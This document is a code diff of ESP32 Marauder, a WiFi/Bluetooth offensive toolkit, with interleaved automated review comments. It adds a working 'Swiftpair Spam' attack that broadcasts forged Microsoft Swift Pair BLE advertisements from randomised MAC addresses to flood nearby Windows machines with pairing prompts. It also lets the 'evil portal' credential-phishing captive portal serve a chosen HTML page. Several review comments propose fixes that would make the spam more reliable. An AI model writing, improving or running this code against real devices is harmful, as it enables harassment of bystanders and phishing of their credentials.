diff --git a/README.md b/README.md
index bc3f949f6..80b352255 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
-# ESP32 Marauder v0.13.1
+# ESP32 Marauder v0.13.2
A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32
diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp
index c4ac82fca..0ccaa9d70 100644
--- a/esp32_marauder/CommandLine.cpp
+++ b/esp32_marauder/CommandLine.cpp
@@ -250,6 +250,7 @@ void CommandLine::runCommand(String input) {
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
Serial.println(HELP_BT_SOUR_APPLE_CMD);
+ Serial.println(HELP_BT_SWIFTPAIR_SPAM_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
@@ -482,6 +483,7 @@ void CommandLine::runCommand(String input) {
// AP Scan
else if (cmd_args.get(0) == EVIL_PORTAL_CMD) {
int cmd_sw = this->argSearch(&cmd_args, "-c");
+ int html_sw = this->argSearch(&cmd_args, "-w");
if (cmd_sw != -1) {
String et_command = cmd_args.get(cmd_sw + 1);
@@ -491,6 +493,14 @@ void CommandLine::runCommand(String input) {
display_obj.clearScreen();
menu_function_obj.drawStatusBar();
#endif
+ if (html_sw != -1) {
+ String target_html_name = cmd_args.get(html_sw + 1);
+ evil_portal_obj.target_html_name = target_html_name;
+ Serial.println("Set html file as " + evil_portal_obj.target_html_name);
+ }
+ //else {
+ // evil_portal_obj.target_html_name = "index.html";
+ //}
wifi_scan_obj.StartScan(WIFI_SCAN_EVIL_PORTAL, TFT_MAGENTA);
}
else if (et_command == "reset") {
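Review bot: The new `-w` branch reads `cmd_args.get(html_sw + 1)` without checking that anything follows `-w`, so `evilportal -c start -w` stores whatever `get()` yields past the end (presumably an empty String) and EvilPortal::setHtml then tries to open `"/"`; guard it with the list's length, e.g. `if (html_sw != -1 && cmd_args.size() > html_sw + 1)`, and print a usage error otherwise. Because setHtml concatenates the name after `"/"`, a value containing a path separator also resolves outside the SD root; a one-line `if (target_html_name.indexOf('/') != -1) { Serial.println("Invalid html file name"); return; }` keeps the portal to root-level files. The commented-out `else` that would reset to `index.html` should either be restored or deleted rather than left as dead text; as written, a name set by an earlier `sethtml` silently persists across `-c start` calls, which may be intended but is undocumented. runCommand begins and ends outside this hunk.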
@@ -500,7 +510,9 @@ void CommandLine::runCommand(String input) {
}
else if (et_command == "sethtml") {
-
+ String target_html_name = cmd_args.get(cmd_sw + 2);
+ evil_portal_obj.target_html_name = target_html_name;
+ Serial.println("Set html file as " + evil_portal_obj.target_html_name);
}
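Review bot: `cmd_args.get(cmd_sw + 2)` in the new `sethtml` branch is read unconditionally, so `evilportal -c sethtml` with no file name sets `target_html_name` to an empty (or out-of-range) value instead of reporting a usage error; add `if (cmd_args.size() <= cmd_sw + 2) { Serial.println("Usage: evilportal -c sethtml <file>"); return; }` before the assignment, using whatever length accessor the argument list provides. The name is also accepted without checking that the file exists on the SD card, so a typo only surfaces later when the portal starts; a quick `sd_obj.getFile("/" + target_html_name)` probe here would fail fast. runCommand continues outside this hunk.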
else if (et_command == "setap") {
@@ -784,6 +796,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
+ else if (cmd_args.get(0) == BT_SWIFTPAIR_SPAM_CMD) {
+ #ifdef HAS_BT
+ Serial.println("Starting Swiftpair Spam attack. Stop with " + (String)STOPSCAN_CMD);
+ #ifdef HAS_SCREEN
+ display_obj.clearScreen();
+ menu_function_obj.drawStatusBar();
+ #endif
+ wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+ #else
+ Serial.println("Bluetooth not supported");
+ #endif
+ }
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h
index 157e57973..c2bff8b1f 100644
--- a/esp32_marauder/CommandLine.h
+++ b/esp32_marauder/CommandLine.h
@@ -78,6 +78,7 @@ const char PROGMEM SSID_CMD[] = "ssid";
// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
@@ -96,7 +97,7 @@ const char PROGMEM HELP_GPS_DATA_CMD[] = "gpsdata";
const char PROGMEM HELP_GPS_CMD[] = "gps [-g] ";
// WiFi sniff/scan
-const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start]";
+const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start [-w html.html]/sethtml ]";
const char PROGMEM HELP_SIGSTREN_CMD[] = "sigmon";
const char PROGMEM HELP_SCANAP_CMD[] = "scanap";
const char PROGMEM HELP_SCANSTA_CMD[] = "scansta";
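Review bot: The new help string `evilportal [-c start [-w html.html]/sethtml ]` hides that `sethtml` takes its own file-name argument (CommandLine.cpp reads `cmd_args.get(cmd_sw + 2)` for it) and folds two sub-commands into one bracket, so a user cannot tell what to type. Suggest `"evilportal [-c start [-w html.html]] [-c sethtml html.html]"`, or two constants in the style of `HELP_SSID_CMD_B`, so each form is shown on its own line. The trailing space before `]` also looks accidental.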
@@ -124,6 +125,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r ";
// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
diff --git a/esp32_marauder/EvilPortal.cpp b/esp32_marauder/EvilPortal.cpp
index 86c5b8c26..c55b783c5 100644
--- a/esp32_marauder/EvilPortal.cpp
+++ b/esp32_marauder/EvilPortal.cpp
@@ -65,7 +65,7 @@ void EvilPortal::setupServer() {
bool EvilPortal::setHtml() {
Serial.println("Setting HTML...");
#ifndef WRITE_PACKETS_SERIAL
- File html_file = sd_obj.getFile("/index.html");
+ File html_file = sd_obj.getFile("/" + this->target_html_name);
if (!html_file) {
#ifdef HAS_SCREEN
this->sendToDisplay("Could not find /index.html.");
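Review bot: The failure message on the line after the changed `getFile` call still hardcodes `Could not find /index.html.` even though the file opened is now `"/" + this->target_html_name`, so a missing custom page reports the wrong file name. Change it to `this->sendToDisplay("Could not find /" + this->target_html_name + ".");` and do the same for any Serial print of the same message further down. EvilPortal::setHtml continues past the end of this hunk.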
diff --git a/esp32_marauder/EvilPortal.h b/esp32_marauder/EvilPortal.h
index 2e8923d68..19e3f7cb9 100644
--- a/esp32_marauder/EvilPortal.h
+++ b/esp32_marauder/EvilPortal.h
@@ -99,6 +99,8 @@ class EvilPortal {
public:
EvilPortal();
+ String target_html_name = "index.html";
+
String get_user_name();
String get_password();
void addLog(String log, int len);
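Review bot: The new public member `target_html_name` has no comment saying what it is relative to or who writes it, and since CommandLine.cpp assigns it directly the contract is easy to get wrong. Add above the declaration: `// Bare file name, resolved as "/" + name on the SD card by setHtml(); set via "evilportal -c sethtml <file>" or "-c start -w <file>". Defaults to index.html.` Making the setter a method that validates the name would be cleaner than a public mutable field, but that is a larger change.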
diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index e5151bd60..05f1c4539 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -495,6 +495,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -552,6 +553,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1419,6 +1421,11 @@ void MenuFunctions::RunSetup()
this->drawStatusBar();
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
});
+ this->addNodes(&bluetoothAttackMenu, "Swiftpair Spam", TFT_CYAN, NULL, KEYBOARD_ICO, [this]() {
+ display_obj.clearScreen();
+ this->drawStatusBar();
+ wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+ });
// Device menu
deviceMenu.parentMenu = &mainMenu;
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index ce378554d..f03346ef2 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -17,6 +17,11 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
return 0;
}
+extern "C" {
+ uint8_t esp_base_mac_addr[6];
+ esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr);
+}
+
#ifdef HAS_BT
//ESP32 Sour Apple by RapierXbox
//Exploit by ECTO-1A
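Review bot: The new `extern "C"` block defines a global array `esp_base_mac_addr[6]` and declares `esp_ble_gap_set_rand_addr`, yet nothing in this diff uses either — `executeSwiftpairSpam` calls `esp_base_mac_addr_set` instead. The array is a definition rather than an `extern` declaration, so it allocates storage and could collide with any same-named symbol in the SDK; the hand-written prototype can also drift from the real ESP-IDF signature. Drop the block, or if the BLE random-address API is the intended route, include the IDF header that declares it rather than re-declaring it here.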
@@ -48,6 +53,37 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
return randomAdvertisementData;
}
+ NimBLEAdvertisementData getSwiftAdvertisementData() {
+ extern WiFiScan wifi_scan_obj;
+ NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
+ const char* display_name = wifi_scan_obj.generateRandomName();
+ uint8_t display_name_len = strlen(display_name);
+
+ uint8_t size = 7 + display_name_len;
+ uint8_t* packet = (uint8_t*)malloc(size);
+ uint8_t i = 0;
+
+ packet[i++] = size - 1; // Size
+ packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
+ packet[i++] = 0x06; // Company ID (Microsoft)
+ packet[i++] = 0x00; // ...
+ packet[i++] = 0x03; // Microsoft Beacon ID
+ packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
+ packet[i++] = 0x80; // Reserved RSSI Byte
+ for (int j = 0; j < display_name_len; j++) {
+ packet[i + j] = display_name[j];
+ }
+ i += display_name_len;
+
+ randomAdvertisementData.addData(std::string((char *)packet, size));
+
+ free(packet);
+
+ free((void*)display_name);
+
+ return randomAdvertisementData;
+ }
+
class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
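Review bot: `getSwiftAdvertisementData` builds the AD structure in a raw `malloc` buffer with no null check and hands the bytes to `addData` via a temporary `std::string`, then frees both the buffer and the name it received from `generateRandomName`; the ownership of that name is not documented anywhere, so the `free((void*)display_name)` reads like a bug to a newcomer. Building the payload directly in a `std::string` removes the manual allocation and the length bookkeeping while producing identical bytes (length byte is `6 + name_len`, as `size - 1` is today). The surrounding `#ifdef HAS_BT` region begins before this hunk.
```cpp
NimBLEAdvertisementData getSwiftAdvertisementData() {
  extern WiFiScan wifi_scan_obj;
  NimBLEAdvertisementData advData = NimBLEAdvertisementData();
  const char* display_name = wifi_scan_obj.generateRandomName();
  const size_t display_name_len = strlen(display_name);

  // Manufacturer-specific AD structure: length byte, AD type, then payload.
  std::string packet;
  packet.reserve(7 + display_name_len);
  packet.push_back(static_cast<char>(6 + display_name_len)); // Size (excludes the length byte itself)
  packet.push_back(static_cast<char>(0xFF));                 // AD Type (Manufacturer Specific)
  packet.push_back(0x06);                                    // Company ID (Microsoft)
  packet.push_back(0x00);                                    // ...
  packet.push_back(0x03);                                    // Microsoft Beacon ID
  packet.push_back(0x00);                                    // Microsoft Beacon Sub Scenario
  packet.push_back(static_cast<char>(0x80));                 // Reserved RSSI Byte
  packet.append(display_name, display_name_len);

  advData.addData(packet);
  free((void*)display_name); // generateRandomName() returns malloc'd storage owned by the caller
  return advData;
}
```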
@@ -447,6 +483,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunSourApple(scan_mode, color);
#endif
}
+ else if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) {
+ #ifdef HAS_BT
+ RunSwiftpairSpam(scan_mode, color);
+ #endif
+ }
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
@@ -611,6 +652,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
else if ((currentScanMode == BT_SCAN_ALL) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
@@ -1407,6 +1449,46 @@ void WiFiScan::executeSourApple() {
#endif
}
+const char* WiFiScan::generateRandomName() {
+ const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ int len = rand() % 10 + 1; // Generate a random length between 1 and 10
+ char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name
+ for (int i = 0; i < len; ++i) {
+ randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset
+ }
+ randomName[len] = '\0'; // Null-terminate the string
+ return randomName;
+}
+
+void WiFiScan::generateRandomMac(uint8_t* mac) {
+ for (int i = 0; i < 6; i++) {
+ mac[i] = random(0, 255);
+ }
+}
+
+void WiFiScan::executeSwiftpairSpam() {
+ #ifdef HAS_BT
+ uint8_t macAddr[6];
+ generateRandomMac(macAddr);
+
+ esp_base_mac_addr_set(macAddr);
+
+ NimBLEDevice::init("");
+
+ NimBLEServer *pServer = NimBLEDevice::createServer();
+
+ pAdvertising = pServer->getAdvertising();
+
+ NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+ pAdvertising->setAdvertisementData(advertisementData);
+ pAdvertising->start();
+ delay(10);
+ pAdvertising->stop();
+
+ NimBLEDevice::deinit();
+ #endif
+}
+
void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
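Review bot: `generateRandomMac` fills all six bytes with `random(0, 255)`, so about half the generated addresses have the multicast bit (LSB of the first octet) set, and as far as I recall `esp_base_mac_addr_set` rejects a non-unicast base MAC with `ESP_ERR_INVALID_ARG`; since `executeSwiftpairSpam` ignores the return value, those iterations silently keep the previous address and the "randomised" advertiser is less random than intended. Clear the bit in the generator, `mac[0] &= 0xFE;`, and check the call, `if (esp_base_mac_addr_set(macAddr) != ESP_OK) Serial.println("Failed to set base MAC");`. Note also that Arduino's `random(0, 255)` never yields 0xFF, and that `generateRandomName` returns `malloc`'d memory the caller must `free()` — that contract deserves a comment on the function. executeWarDrive, which begins at the end of this hunk, continues outside it.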
@@ -1781,6 +1863,26 @@ void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
#endif
}
+void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
+ #ifdef HAS_BT
+ #ifdef HAS_SCREEN
+ display_obj.TOP_FIXED_AREA_2 = 48;
+ display_obj.tteBar = true;
+ display_obj.print_delay_1 = 15;
+ display_obj.print_delay_2 = 10;
+ display_obj.initScrollValues(true);
+ display_obj.tft.setTextWrap(false);
+ display_obj.tft.setTextColor(TFT_BLACK, color);
+ display_obj.tft.fillRect(0,16,240,16, color);
+ display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2);
+ display_obj.touchToExit();
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ #endif
+
+ this->ble_initialized;
+ #endif
+}
+
// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
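Review bot: `this->ble_initialized;` at the end of `RunSwiftpairSpam` is an expression statement with no effect — it reads the member and discards the value — and most compilers will warn about an unused result; it looks like a leftover from copying the Sour Apple setup. Either assign whatever state the scan loop expects (e.g. `this->ble_initialized = true;` if that is what `RunSourApple` does, which is not visible here) or delete the line so the intent is not ambiguous. RunBluetoothScan, which starts at the end of this hunk, continues outside it.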
@@ -4125,6 +4227,25 @@ void WiFiScan::main(uint32_t currentTime)
this->executeSourApple();
#endif
}
+ else if (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) {
+ #ifdef HAS_BT
+ if (currentTime - initTime >= 1000) {
+ initTime = millis();
+ String displayString = "";
+ String displayString2 = "";
+ displayString.concat("Advertising Data...");
+ for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+ displayString2.concat(" ");
+ #ifdef HAS_SCREEN
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ display_obj.showCenterText(displayString2, 160);
+ display_obj.showCenterText(displayString, 160);
+ #endif
+ }
+
+ this->executeSwiftpairSpam();
+ #endif
+ }
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index 6392388e6..b84856be6 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -82,6 +82,7 @@
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
#define BT_ATTACK_SOUR_APPLE 36
+#define BT_ATTACK_SWIFTPAIR_SPAM 37
#define GRAPH_REFRESH 100
@@ -251,7 +252,9 @@ class WiFiScan
void clearMacHistory();
void executeWarDrive();
void executeSourApple();
+ void executeSwiftpairSpam();
void startWardriverWiFi();
+ void generateRandomMac(uint8_t* mac);
void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
@@ -284,6 +287,7 @@ class WiFiScan
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
void RunSourApple(uint8_t scan_mode, uint16_t color);
+ void RunSwiftpairSpam(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
@@ -346,6 +350,7 @@ class WiFiScan
void main(uint32_t currentTime);
void StartScan(uint8_t scan_mode, uint16_t color = 0);
void StopScan(uint8_t scan_mode);
+ const char* generateRandomName();
//void addLog(String log, int len);
static void getMAC(char *addr, uint8_t* data, uint16_t offset);
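Review bot: The new public declaration `const char* generateRandomName();` gives no hint that the returned pointer is heap-allocated with `malloc` in WiFiScan.cpp and must be released by the caller, which is exactly the kind of contract a header should state. Add `// Returns a malloc'd, NUL-terminated random ASCII name of 1-10 characters; caller must free() it.` above the declaration. Returning a `String` instead would remove the ownership question entirely, but that changes the signature used by getSwiftAdvertisementData.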
diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h
index 8991d2b1a..af53a9893 100644
--- a/esp32_marauder/configs.h
+++ b/esp32_marauder/configs.h
@@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS
- #define MARAUDER_VERSION "v0.13.1"
+ #define MARAUDER_VERSION "v0.13.2"
//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC